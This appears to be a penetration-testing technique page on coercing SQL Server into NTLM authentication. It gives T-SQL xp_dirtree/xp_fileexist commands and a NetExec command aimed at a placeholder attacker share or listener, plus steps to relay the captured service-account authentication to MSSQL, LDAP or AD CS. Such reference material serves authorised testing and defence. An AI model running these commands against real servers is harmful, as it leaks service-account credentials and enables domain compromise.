SQL Server will reach out to a UNC path on command, and any public login can usually make it do so through xp_dirtree or xp_fileexist. Point that path at an attacker listener and the instance authenticates with its service account over SMB, handing you a NetNTLM response to capture and crack or, far better, to relay. This turns a low-privilege database session into movement across instances or into the domain, without any sysadmin right.
Triggering the outbound authentication#
-- any public login can usually call these; the UNC target is attacker-controlled
EXEC xp_dirtree '\\<attacker>\share', 1, 1;
EXEC xp_fileexist '\\<attacker>\share\x';
EXEC master.dbo.xp_subdirs '\\<attacker>\share';
# NetExec coerces the authentication for you
nxc mssql <target> -u user -p pass -M mssql_coerce -o LISTENER=<attacker-ip>
What to do with the coerced authentication#
- Relay to another MSSQL where the service account is privileged: relaying the service account's connection to a second instance can promote you to sysadmin there.
- Relay to LDAP / AD CS: the MSSQL service often runs as a domain account, so its coerced authentication feeds RBCD, shadow credentials, or a certificate exactly like any other coerced domain authentication.
- Capture and crack the NetNTLM where the service account password is weak.
Exploitation notes#
- The coercion needs only
public, so it works from the lowest foothold and before any escalation inside the engine. - The value depends on the service account: a domain service account makes this an Active Directory relay primitive, not just a database trick.
ntlmrelayxsupports relaying to MSSQL targets directly, so an MSSQL-to-MSSQL relay is a self-contained privilege escalation across instances.- Combine with enumeration to pick a relay target where the coerced account is sysadmin.
Tools#
- NetExec
mssql(-M mssql_coerce): trigger the outbound authentication. - Impacket
mssqlclient.py: callxp_dirtree/xp_fileexistinteractively. - ntlmrelayx.py: relay the coerced service-account authentication to MSSQL, LDAP, or AD CS.